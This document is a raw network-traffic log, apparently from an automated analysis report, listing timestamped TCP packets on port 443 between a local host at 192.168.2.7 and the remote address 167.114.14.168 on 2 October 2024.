                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.496512890 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.496520042 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.496591091 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.496800900 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.496824980 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.496866941 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.496874094 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.496912956 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.496912956 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.509494066 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.509525061 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.509567976 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.509577990 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.509598970 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.509624004 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.582139015 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.582170963 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.582381010 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.582391024 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.582437992 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.583425045 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.583451986 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.583508015 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.583517075 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.583554029 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.583971977 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.583992958 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.584027052 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.584033012 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.584060907 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.584079981 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.585186958 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.585212946 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.585248947 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.585254908 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.585278034 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.585300922 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.586222887 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.586251020 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.586294889 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.586301088 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.586330891 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.586349964 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.587037086 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.587063074 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.587112904 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.587120056 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.587152958 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.587498903 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.587519884 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.587552071 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.587558031 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.587575912 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.587590933 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.591860056 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.603334904 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.603370905 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.603415012 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.603425980 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.603461027 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.672981024 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.673017025 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.673079967 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.673103094 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.673136950 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.673151970 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.673964977 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.673990965 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.674036980 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.674042940 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.674069881 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.674087048 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.674583912 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.674606085 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.674669981 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.674676895 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.674719095 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.675862074 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.675893068 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.675935984 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.675942898 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.675966024 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.675982952 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.677414894 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.677440882 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.677484989 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.677495956 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.677516937 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.677536964 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.677735090 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.677761078 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.677798986 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.677804947 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.677825928 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.677849054 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.678237915 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.678257942 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.678299904 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.678306103 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.678330898 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.678350925 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.690704107 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.690736055 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.690809965 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.690818071 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.690860987 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.763761997 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.763793945 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.763927937 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.763946056 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.763987064 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.764576912 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.764605045 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.764646053 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.764652967 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.764678001 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.764695883 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.765120029 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.765146971 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.765201092 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.765208960 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.765244007 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.766415119 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.766443968 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.766484976 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.766490936 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.766516924 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.766531944 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.768562078 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.768591881 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.768637896 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.768645048 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.768668890 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.768682957 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.769043922 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.769067049 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.769113064 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.769119978 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.769140959 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.769162893 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.769598007 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.769620895 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.769663095 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.769670010 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.769691944 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.769710064 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.781218052 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.781250000 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.781379938 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.781402111 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.781478882 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.854320049 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.854361057 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.854468107 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.854480982 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.854526043 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.855171919 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.855206013 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.855245113 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.855252028 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.855278969 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.855302095 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.855705023 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.855740070 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.855779886 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.855786085 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.855809927 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.855827093 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.857023001 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.857058048 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.857100010 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.857105970 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.857127905 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.857146025 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.859216928 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.859260082 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.859298944 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.859306097 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.859323978 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.859339952 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.859766960 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.859795094 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.859833002 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.859838963 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.859858036 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.859875917 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.860183001 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.860213995 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.860304117 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.860311985 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.860354900 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.871728897 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.871757984 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.871866941 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.871874094 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.871953011 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.945070028 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.945101976 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.945137978 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.945168018 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.945184946 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.945199966 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.945616007 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.945642948 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.945672989 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.945679903 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.945703030 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.945720911 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.946188927 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.946216106 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.946264982 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.946271896 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.946305037 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.947505951 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.947535992 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.947566032 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.947571993 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.947586060 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.947602034 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.949917078 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.949945927 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.949976921 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.949985027 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.950006008 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.950023890 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.950371027 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.950395107 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.950423956 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.950431108 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.950457096 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.950479031 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.950740099 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.950762987 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.950798035 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.950804949 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.950829029 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.950849056 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.962399006 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.962429047 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.962467909 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.962482929 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.962508917 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.962519884 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:52.035720110 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:52.035748959 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:52.035871983 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:52.035891056 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:52.035938978 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:52.036329985 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:52.036359072 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:52.036417007 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:52.036423922 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:52.036468983 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:52.036820889 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:52.036843061 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:52.036887884 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:52.036894083 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:52.036921024 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:52.036940098 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:52.038086891 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:52.038114071 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:52.038151026 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:52.038156986 CEST44349713167.114.14.168192.168.2.7
